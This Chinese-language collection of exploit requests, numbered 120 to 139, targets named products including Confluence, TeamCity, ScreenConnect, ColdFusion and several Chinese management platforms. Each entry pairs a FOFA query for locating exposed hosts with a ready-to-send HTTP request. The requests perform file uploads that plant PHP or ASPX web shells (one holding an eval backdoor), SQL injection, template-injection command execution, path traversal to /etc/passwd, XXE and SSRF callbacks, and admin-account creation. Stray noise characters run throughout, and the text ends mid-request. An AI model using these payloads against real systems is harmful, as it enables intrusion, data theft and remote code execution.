' W& I6 a3 |0 ^/ v; A$ _& o/ n+ u( ^# w1 x8 }
120. 北京百绰智能S40管理平台导入web.php任意文件上传
$ e- N! y+ y' b3 [9 G% }CVE-2024-1253
- r$ @: N F& k; \FOFA:title="Smart管理平台"
7 x8 N5 j4 e1 M5 A! \3 Q, j# \POST /useratte/web.php? HTTP/1.19 _' d3 r7 Q/ G0 j! c8 n0 p% H7 Y
Host: ip:port
8 U% y; A# H& kCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db5 g- R5 v: d7 I* S# V4 [. m
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
/ w, ]* v' E. Y4 ?" L; Z7 H/ NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& j2 t/ G" V( C; d8 e* _# \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 N3 V3 ?& @8 P; TAccept-Encoding: gzip, deflate
/ I% i( i5 r% t; eContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328) T% \9 s( ]7 Z+ T
Content-Length: 597
" h4 l: g- h4 Z. ^Origin: https://ip:port
# a! m+ N0 a. @6 D1 V2 G4 O" AReferer: https://ip:port/sysmanage/licence.php: ^% b) B8 H3 O
Upgrade-Insecure-Requests: 11 @9 m2 A, e" f; N5 B
Sec-Fetch-Dest: document9 S. e6 f! {! F8 `/ i- J
Sec-Fetch-Mode: navigate* \9 t$ C* q3 Q3 n$ y& p
Sec-Fetch-Site: same-origin- k# @$ g- Z C( D+ L7 g h2 R
Sec-Fetch-User: ?1
2 H+ {9 I$ q# X M" }$ l% G5 bTe: trailers0 e$ a! G0 f# i/ n1 G: M! j
Connection: close
* G+ U; N5 ^( B9 Q, G+ s6 j, Y: g2 V4 J5 T% r' O4 _. U5 a: O
-----------------------------42328904123665875270630079328! p6 s5 P& e: A, h% W+ |
Content-Disposition: form-data; name="file_upload"; filename="2.php") U* D6 F( X; I$ `5 g! _ M) M
Content-Type: application/octet-stream, n/ L( C( O2 @# z8 q K `! N/ @" F& O
- s$ T: _5 k# n( g6 N) g
<?php phpinfo()?>
$ B) H# u* N& w# B* R9 n" ]-----------------------------42328904123665875270630079328+ T; d- G/ v3 Y
Content-Disposition: form-data; name="id_type"
* B$ T4 Y# X1 k) r3 {) h2 `( m8 X& d ~7 j+ E
1
0 Y% V& l6 G) E$ p4 w$ A-----------------------------42328904123665875270630079328! Z& V5 a. M9 G
Content-Disposition: form-data; name="1_ck"& H5 H6 P- f+ J' u* _( U0 n
6 z% ~" x& M" ]1 x; T1_radhttp5 C6 ?! G8 J( [, k) c2 b
-----------------------------42328904123665875270630079328: B6 V# U& S4 ^& _7 Z& d
Content-Disposition: form-data; name="mode"
, Y" k) @/ t* v5 V! G# L) S0 w ?. e( V% S% r
import: z' d( h& X: e6 }
-----------------------------423289041236658752706300793288 G* t6 O/ r5 y) b! V
0 ]% g0 X( u1 y# A ?. ?5 y! r, i8 Y0 u
; j# V y/ L' [. P. @文件路径/upload/2.php# O7 y3 p+ {4 `, f" [! ?
' v/ E% ^" R) w, ^8 V2 |( u121. 北京百绰智能S42管理平台userattestation.php任意文件上传
; ?' z+ g, }' |4 dCVE-2024-1918
! M; I8 Y- S, l l( Z4 \/ hFOFA:title="Smart管理平台"8 P2 N' n' J* P4 e' V1 W
POST /useratte/userattestation.php HTTP/1.1# J' X3 C0 G- E8 u3 N
Host: 192.168.40.130:8443 z2 @8 l- M2 U' N0 I& o
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50/ h4 _' a& \$ q# `1 V2 `
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko7 y! Z) {$ r" G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* G v& O( a$ d& |. x- }* w+ xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. l: a+ X2 w# U" u& K# |" ]0 H
Accept-Encoding: gzip, deflate5 e% K* r; V/ s# X
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328* z' u" z8 q' u) D$ r* K- M
Content-Length: 592$ s# K: F& o# o# W$ g
Origin: https://192.168.40.130:8443 F* F$ N% n4 ^. ~( h
Upgrade-Insecure-Requests: 1 ]. x6 K: d" ^2 S
Sec-Fetch-Dest: document
6 [1 l0 l% e, g& N/ {Sec-Fetch-Mode: navigate2 Q+ g& q1 y5 e
Sec-Fetch-Site: same-origin- q6 l3 H( B) \2 o% F, A
Sec-Fetch-User: ?15 @& K% ?+ u1 ?. A7 }
Te: trailers
; X, w* l% C, E1 X6 X: q. MConnection: close
p2 B! K+ O! r. ^' \; ~
2 ^4 v* Y |$ X- R-----------------------------42328904123665875270630079328
! R! L6 x9 _! R7 T; _Content-Disposition: form-data; name="web_img"; filename="1.php"7 K: N% W% n6 W) B
Content-Type: application/octet-stream0 r0 E8 X9 r' c7 M5 h6 g' y) g
4 ]% G6 F V8 w$ r7 m5 g
<?php phpinfo();?>
8 @; Y* p6 Q3 V* m, j' C-----------------------------42328904123665875270630079328
g. h7 V- k T1 J5 j3 kContent-Disposition: form-data; name="id_type"
, j4 S$ @& D" f x1 ^- e2 J. w. K' h" A9 b9 A. D$ y
1
3 p1 y. ?, _8 P5 g$ p-----------------------------42328904123665875270630079328
9 d X$ d- {" `& h# d2 J: cContent-Disposition: form-data; name="1_ck"5 E' I0 e" h9 ?: e9 c) U
( j- G3 Z, @7 W
1_radhttp
+ F! ~- A/ D/ c' g-----------------------------42328904123665875270630079328
' R' @! u* F! y8 t( @" e! [6 ], {* KContent-Disposition: form-data; name="hidwel"5 b1 u A# w4 R8 v
. S& o: f- N% m+ T" ^set0 `; K- y8 Z4 h4 |; Z
-----------------------------42328904123665875270630079328: \ S2 a8 S8 q
% o! }. m- }1 W" B% U
% }' c6 D4 J: ?& {: r- e3 gboot/web/upload/weblogo/1.php: P; Z9 B! c" T! B
D. v( j, n6 H
122. 北京百绰智能s200管理平台/importexport.php sql注入
7 s1 h/ E9 Z& } l7 HCVE-2024-27718FOFA:title="Smart管理平台", F6 k: T; \( q: m0 S
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
! E: J8 s7 t6 K9 Y) \/ x1 U1 VGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1* I/ |# h" Q- x1 r7 r# F; f
Host: x.x.x.x
& M. I7 r* H8 v) RCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
+ w# D" C+ T- uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.09 x& {: H, D# B1 c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- E; ]2 |0 Y5 }* E& Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% w; k8 W/ P2 [+ Z+ MAccept-Encoding: gzip, deflate, br
" y8 r& `5 C! {- c; zUpgrade-Insecure-Requests: 1
9 j5 w9 t2 C/ D# J9 pSec-Fetch-Dest: document( j" i+ r' J, u9 g
Sec-Fetch-Mode: navigate
! C$ A: t9 a& @Sec-Fetch-Site: none$ b" L; P2 j8 n( `
Sec-Fetch-User: ?1
) C. }. F4 l% F* r+ c5 F' aTe: trailers
) j- j' M2 T% ]0 @( d% o2 |Connection: close( B; R8 Y/ f: x" F9 B& X
0 {* D8 k4 r: a J6 z# |: h
1 C6 \# j& D1 \' j6 D123. Atlassian Confluence 模板注入代码执行0 }4 r, h6 [: i$ b" h
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
/ X+ T$ T; X7 |% I9 ?1 v' APOST /template/aui/text-inline.vm HTTP/1.19 T3 E6 V1 z2 d3 l9 N4 g
Host: localhost:8090- M' v# A% A, F( q' A& L& v1 @
Accept-Encoding: gzip, deflate, br) g5 L: Y. X& ^$ t1 j9 M4 s6 T
Accept: */*% E1 N0 z- ~) x" ~ Q
Accept-Language: en-US;q=0.9,en;q=0.84 x3 \% Q+ l+ }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
0 `# X, Y+ s; v3 ?* C3 d3 |, hConnection: close$ V7 N; W i# e4 G
Content-Type: application/x-www-form-urlencoded
' J3 Z6 w, g6 ]+ h0 T! d
3 I& d5 F9 ?2 C. w0 r4 w f; ulabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))6 K$ Y* q5 K. l0 f+ O+ [7 |
1 \- K& k: d: ]: z' \* b5 b# I. s/ w `8 h1 t
124. 湖南建研工程质量检测系统任意文件上传, n6 ^6 ^# N3 I/ ^
FOFA:body="/Content/Theme/Standard/webSite/login.css"( R$ A$ H m0 V) [( k
POST /Scripts/admintool?type=updatefile HTTP/1.1
& Y9 H6 e+ b3 U5 e3 k0 e7 KHost: 192.168.40.130:82822 s( s9 ]. y, v, [9 h. e) a
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" S) p$ T! G `. {9 `
Content-Length: 72" e R1 d, A% U- L# I4 H* `+ q5 q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
, {! E) c% s1 b, v. D1 vAccept-Encoding: gzip, deflate, br
, K" J" [7 i3 G9 d/ d- {, ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 W. P* [& z/ t! P( fConnection: close
( `6 ]6 s0 Y. P& h$ u' e5 U5 xContent-Type: application/x-www-form-urlencoded
0 W! y! s, |. I3 N& K
" I, @: U9 ]4 a/ c' [" @5 ?2 ?filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
1 {) ?" r8 K, G. i
6 {6 I5 @* N/ l0 p& ]9 J+ m, [4 T$ g: l5 }
http://192.168.40.130:8282/Scripts/abcgcg.aspx( u4 ?2 O" |5 C: z$ E
% t0 d/ Q% [" J7 K0 g) ]; p
125. ConnectWise ScreenConnect身份验证绕过; z$ j7 U) d+ _! A6 \
CVE-2024-1709
8 ?$ @ M' v! B# s0 d7 h2 v2 `FOFA:icon_hash="-82958153"! f+ s; |4 a: B; r! h
https://github.com/watchtowrlabs ... bypass-add-user-poc" ~8 U0 X" l- h& v
5 u1 o# j0 W9 V; `& ]" r: Z, l: a8 P
* Z7 i' C, A# E! ~- A8 d$ k使用方法
6 n: K( v! W1 U7 i: vpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!+ d. \( L5 Y; _5 D* q, {
0 n, _0 X. n+ Q$ X- E7 B
' a9 q2 y3 u- u5 g) w' @$ d& J创建好用户后直接登录后台,可以执行系统命令。: x ~/ j2 y' Q# A
' }) E& b% } p+ t7 q8 p5 a y
126. Aiohttp 路径遍历/ \! q0 S% T! B
FOFA:title=="ComfyUI"
9 j3 Q3 v; @, ?3 S0 l. N; x* QGET /static/../../../../../etc/passwd HTTP/1.1
3 m' T) x# y! C& wHost: x.x.x.x1 }1 e T4 u% d+ U' j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.360 i' L) [' \ ?, o* U I
Connection: close8 V$ p- m8 k* h* }5 \6 _, C
Accept: */*+ ] q2 }' a5 [* H0 ?* ~
Accept-Language: en
- P4 E4 Z/ H1 G2 N1 }Accept-Encoding: gzip
8 d. O3 H* x- b t% u( ]: `5 Y
* A: `3 x1 X) N% n. u9 l& p: Z* K0 M) C
127. 广联达Linkworks DataExchange.ashx XXE* s4 W$ s; ~$ x
FOFA:body="Services/Identification/login.ashx"
; Z8 A, v+ h8 S5 s, L3 c) nPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1' B5 g! F! \8 g% s
Host: 192.168.40.130:8888
, S& R% T7 @, l& T+ [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
: I& `8 o/ L+ CContent-Length: 415
4 q& h% V ~: G3 CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: b: I! I7 ~; e( yAccept-Encoding: gzip, deflate
2 ]& ], T- e$ {) T' T& M. J: uAccept-Language: zh-CN,zh;q=0.9& {# g7 ~7 c" A* o; Y' U0 Z6 j
Connection: close2 X+ ~2 b1 g% P4 Z
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
& \/ l9 j( W! ^+ ^: SPurpose: prefetch: K8 A) u B* b
Sec-Purpose: prefetch;prerender
o/ K$ a* n$ M) j/ a
' f' I W! W* K" G" S- v------WebKitFormBoundaryJGgV5l5ta05yAIe0
0 r7 N9 h l$ w! _' [ y3 SContent-Disposition: form-data;name="SystemName"
; I8 n# f# {; m5 U \3 E0 @: ?" n! Q" V, Q/ W9 u& z" z
BIM# ~9 F3 S3 e; _3 j- W
------WebKitFormBoundaryJGgV5l5ta05yAIe0
: W* `+ \+ L6 G9 n& D7 fContent-Disposition: form-data;name="Params"
: W8 g1 ~' i: U* \, ^2 K nContent-Type: text/plain
5 I& _4 L0 b( j+ R& h7 `. g& X7 H) _/ { k9 }2 m
<?xml version="1.0" encoding="UTF-8"?>& ~9 G4 F5 U; i# y0 e ?6 n
<!DOCTYPE test [
' ~+ ]& Z8 k N4 T: S<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
j+ i1 A# Q }, `6 k]3 a' M& c4 j- j4 t0 U
>' _) V' d: e2 Y0 E2 g' H
<test>&t;</test>
# ~! x* X/ G+ b------WebKitFormBoundaryJGgV5l5ta05yAIe0--
+ o" {1 K/ r4 `- k
$ H% Q# H; x# r
( z9 Q! O, q2 x7 z# T: u
) p) s7 M% _% D* u% U, g7 @' p2 Q128. Adobe ColdFusion 反序列化/ ]& Q) O7 E/ R3 \
CVE-2023-38203, q# B+ z& s3 \& T% g7 Y( F
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)& t3 f. S3 S; l& h a9 W
FOFA:app="Adobe-ColdFusion"( Y! h8 |2 E( |5 o" o
PAYLOAD" t: G5 N9 |3 g; N" M6 C
/ j1 N" @. s! V6 l; ^
129. Adobe ColdFusion 任意文件读取$ C9 P" G0 U- I, n
CVE-2024-20767
/ y# i6 l0 Z+ _% LFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request" @' m+ U( c3 T* {
第一步,获取uuid/ c$ m5 A' }8 Y m5 U- V2 @6 X
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1; `- J5 e/ j/ F
Host: x.x.x.x& L. J+ K4 \- f k$ p* S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
; P/ L3 q4 _% e u6 \* P9 fAccept: */*
. U! l& n- y0 N; \, }# _, b# EAccept-Encoding: gzip, deflate& P7 b# \2 A i1 [' J+ @3 e# @$ \ \
Connection: close. x8 w% o9 L4 J4 E5 [) e+ v$ S/ O
( V3 F6 `9 f6 D5 ^8 Q
9 ^: j6 A! p/ A+ `4 a第二步,读取/etc/passwd文件2 F" B; N3 H6 d
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1( u8 G& \" T0 D# ~; b& o
Host: x.x.x.x7 }. Z% J! u8 I1 u+ [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
$ n; o8 C# m4 j7 oAccept: */*
/ @7 K0 @% Y2 v, N$ tAccept-Encoding: gzip, deflate
' o" X8 B5 `" z; zConnection: close
' J4 c! I# e' w7 a1 {( @uuid: 85f60018-a654-4410-a783-f81cbd5000b9- g0 J1 U& E- a/ y
$ E. ~9 R) K; D% u; K
; l* A. w9 q+ j6 o& }0 `
130. Laykefu客服系统任意文件上传
, k* a0 ~2 B7 P( g, D" O3 FFOFA:icon_hash="-334624619"
# Z: x/ A- E3 B3 JPOST /admin/users/upavatar.html HTTP/1.1
; _5 q8 d: f6 @6 z9 k2 B( g$ _- a8 G6 hHost: 127.0.0.18 ?) \7 I" u* @: L
Accept: application/json, text/javascript, */*; q=0.01
/ |4 i0 G% Q( P3 b$ \X-Requested-With: XMLHttpRequest4 s0 y8 ~2 z- b- s# h0 h
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
V' m% F) u& xContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
4 @) y$ `/ \; QAccept-Encoding: gzip, deflate" U3 B8 }4 u& x& D) M; F; |- c0 F
Accept-Language: zh-CN,zh;q=0.9
9 |5 G' D7 J6 X7 B: o" q' RCookie: user_name=1; user_id=32 m# ?+ G% S; K9 J, W2 ]
Connection: close
( }& I7 T! Z8 O- x3 b" k( c7 a- C# \. U8 F1 R4 p r' w
------WebKitFormBoundary3OCVBiwBVsNuB2kR1 ?4 |/ l7 Z/ `8 B3 B4 ^
Content-Disposition: form-data; name="file"; filename="1.php"7 ^" w% s' ?4 E% o$ G0 M9 q& g6 E
Content-Type: image/png
4 j1 S+ G; x/ C6 f, Q8 j9 q$ ^
9 f" G. z5 {; b7 u7 C! C. h' U* c. d<?php phpinfo();@eval($_POST['sec']);?>9 P1 w& w# _; \8 A
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
+ K: a& U k) }. G9 L- W, B2 ]+ W2 B1 i" O
& F& Q! @1 K7 }3 k6 P5 h
131. Mini-Tmall <=20231017 SQL注入+ `, r5 v9 r" f; d
FOFA:icon_hash="-2087517259"- ^5 b. S1 A' j
后台地址:http://localhost:8080/tmall/admin
6 r: T7 X8 C, _. p/ C; ohttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)8 I+ ?# g/ x$ c4 i
! r4 K, g- ?2 M8 B4 X0 ^132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过* R5 L7 w7 h2 ~
CVE-2024-27198
! \: o0 x g" O5 lFOFA:body="Log in to TeamCity"; t7 P7 _; K; A* d
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.16 b% Z: |- R+ B/ Q
Host: 192.168.40.130:8111
8 m5 D- ?1 z' J8 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; `; I: P# W; O& d
Accept: */*
2 k( P2 i0 @) w- }Content-Type: application/json
: r8 ]6 T5 N7 fAccept-Encoding: gzip, deflate
* F% V5 [8 _, m, q' _8 t5 n) O5 J$ O9 V$ v
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
3 @7 J$ V* K& D7 @/ G G
! m w- g" \0 o8 I+ ` @4 N9 K% H0 |& F
CVE-2024-27199
0 u/ ^' _8 t) G3 f/res/../admin/diagnostic.jsp
8 Q% R$ ?7 b# O6 E7 d. p/.well-known/acme-challenge/../../admin/diagnostic.jsp7 b2 w9 ^; u1 H3 _( k8 r. X
/update/../admin/diagnostic.jsp
+ ^% S! Y5 G. l: u$ l9 W* o' K+ L( n) c7 ^* u1 J' p' k
# q* h$ ?) `1 E( V0 \# ECVE-2024-27198-RCE.py
$ m0 F `' h+ `3 ?4 I7 y, v$ }
0 h6 [7 d5 h7 b& R) p; e7 p133. H5 云商城 file.php 文件上传$ W+ w6 v' U H" a# a8 t
FOFA:body="/public/qbsp.php"
: t) b3 @" E }( y+ g, OPOST /admin/commodtiy/file.php?upload=1 HTTP/1.18 D: ^1 e: b0 L8 X& l- \) D7 }
Host: your-ip
: Y& i* @+ \% \! \) E3 BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.367 Q1 S# N7 I9 F1 D
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx$ K- B6 j' W. J. d% T2 w; S
* N( s6 J! w: S% Q9 u, B' B/ }
------WebKitFormBoundaryFQqYtrIWb8iBxUCx1 L' d6 m( K- b' {+ K' R, N
Content-Disposition: form-data; name="file"; filename="rce.php"
# o8 ]0 e' I0 ?# Z2 W' X& j) C+ M6 }Content-Type: application/octet-stream# K- w. z$ L# N. w8 M# K. R
6 y. ? Q( y1 \- W<?php system("cat /etc/passwd");unlink(__FILE__);?>6 ?1 b3 C: E2 k" J" U
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
. x. y/ C1 ?7 L% z: G1 q
2 K7 C5 R* k. I1 V/ {" ` V2 ?, ~8 i9 n5 w0 n
" e }; D ?# E3 W+ M$ u8 \134. 网康NS-ASG应用安全网关index.php sql注入, `2 |+ ?2 Z' T; p5 f1 L, Y
CVE-2024-2330
* F- N% A. u" I, b% rNetentsec NS-ASG Application Security Gateway 6.3版本) l7 h& W; ? S" C8 }
FOFA:app="网康科技-NS-ASG安全网关"" F* r( e( t2 ^, l
POST /protocol/index.php HTTP/1.14 G/ F2 o8 i1 `7 i0 ^
Host: x.x.x.x( l' Y$ N; i% ~' j C( E3 A
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
( p# Z1 ^8 b) V9 T. yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
' J' S9 m3 N H9 f& b. R' eAccept: */*
+ A. W0 C4 A$ T y X2 x, \, JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% }& Y# O }/ [) h* F; L
Accept-Encoding: gzip, deflate! U) g* Y c: v: U8 \6 l! d
Sec-Fetch-Dest: empty
# u+ J% a- l {9 O: m/ X @* VSec-Fetch-Mode: cors
7 y# B/ W8 ^4 i# P6 qSec-Fetch-Site: same-origin
; a+ Y+ I" }' \: D. v2 ?, bTe: trailers
) M8 Z* E: l% v4 C4 d8 SConnection: close5 R3 \6 l7 Y/ E& P* w3 b: k; Y$ i$ S
Content-Type: application/x-www-form-urlencoded
* Z% `. r% r5 b' n/ PContent-Length: 263
2 [9 H/ \5 H/ K' {0 C% [: M8 R
3 F6 A5 L: z1 Z3 Ejsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}, j9 F# X, W3 s; C( R5 T2 x
- E9 s* Q! G( y4 Y) q. N! L3 R- O0 a* f7 q6 M* |! c8 k
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入" ]% w! q( Z l5 o; z) ]
CVE-2024-2022+ g2 n+ \0 X W) z
Netentsec NS-ASG Application Security Gateway 6.3版本
$ j& |" _: i0 X5 t) D# \2 s2 oFOFA:app="网康科技-NS-ASG安全网关"8 i' K; Q% T8 e6 S9 t) F+ J
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.10 r1 a4 F' n6 b( Q3 [* E7 g, Y2 C
Host: x.x.x.x
% k. W- h" H2 e: D- b0 v2 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
' s7 ?! W1 P& s' `5 GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' j! Y3 f7 x: _& G9 `1 K* W' ~$ h
Accept-Encoding: gzip, deflate
2 z5 s7 a* J( D& E8 l# M4 ~! p' V; rAccept-Language: zh-CN,zh;q=0.9
w" R9 g8 w! BConnection: close% v( J7 l- Y& }9 m {8 {
7 f4 l; {3 B, \2 T3 A4 X- c4 _$ H; N* T! x1 v* X( G# [
136. NextChat cors SSRF
5 _: M! j k8 k4 YCVE-2023-49785
% U* F7 v" T$ I# p: lFOFA:title="NextChat"3 P2 |& J" g! v5 T7 S" R8 f+ X
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
' U, c7 R( `$ o5 {& BHost: x.x.x.x:10000) T+ R0 J' p& w9 j; R
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 p6 q3 V- A, j9 u- E6 I3 x* fConnection: close. h) B3 c+ {& g
Accept: */*
/ R: j& q- t6 m& aAccept-Language: en
5 d- H2 W9 ]+ fAccept-Encoding: gzip7 w) P# p: F' s/ R; @5 j, P/ s" j
( }: j! u i8 T, t5 E1 I# y8 b7 C! i d* M
137. 福建科立迅通信指挥调度平台down_file.php sql注入+ E& C; g+ v0 a) k# {+ v
CVE-2024-2620
& {' S" f; n/ e( `4 }. I+ KFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"& S) `3 |4 K6 ]# {5 A# w% i* ?
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
) H* E2 l6 _; kHost: x.x.x.x
$ x1 a) K# \( p' n8 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
F9 \- q8 D6 _: E& r( q$ q+ G! m aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ e/ W( O$ w8 b; s& \% n2 W- K2 QAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) K, N/ D9 _ F* \- h
Accept-Encoding: gzip, deflate, br
6 u7 u9 P# L0 n& l) W* wConnection: close3 Z. P# ~" C1 m' N \9 N D/ U
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
" H: H5 J' m! `; IUpgrade-Insecure-Requests: 1
* x% L% H+ B# b: W4 X5 T: B% |; r3 u* G
+ O( W, o) Y o! u: A138. 福建科立讯通信指挥调度平台pwd_update.php sql注入5 [+ T$ a5 U, T
CVE-2024-2621, g5 S' |/ Y; U9 J+ ~) C: S9 H
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
- { ~$ i7 s4 r2 @' QGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1 X. t3 g ^( K6 y
Host: x.x.x.x
: l7 g5 R0 R' B* N$ SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0, y- u( R1 g3 _7 T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' m% u Z' Y: o4 b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 M+ x3 g" B6 z: j; o: j q" |7 T" {. }
Accept-Encoding: gzip, deflate, br
' G+ U) j6 a3 |# ?. @Connection: close
) |' D- m. I- n5 o+ K( A1 [8 A5 eUpgrade-Insecure-Requests: 1& x( r v7 k: s0 u- E
+ L: ^% i/ F& W0 K+ s. K
5 ^) U Y4 p @. l139. 福建科立讯通信指挥调度平台editemedia.php sql注入
4 H5 j* I J0 r( U. O% t. n, BCVE-2024-2622
, s5 a/ v# J* B) a8 VFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
4 p7 z8 D1 K# Z6 U2 m# LGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
: F4 f# }2 I, Y9 H9 zHost: x.x.x.x( _" J: X2 v, D: @3 ~. Y: _) k* t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0/ u0 H7 p3 b: ^# `3 R* Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
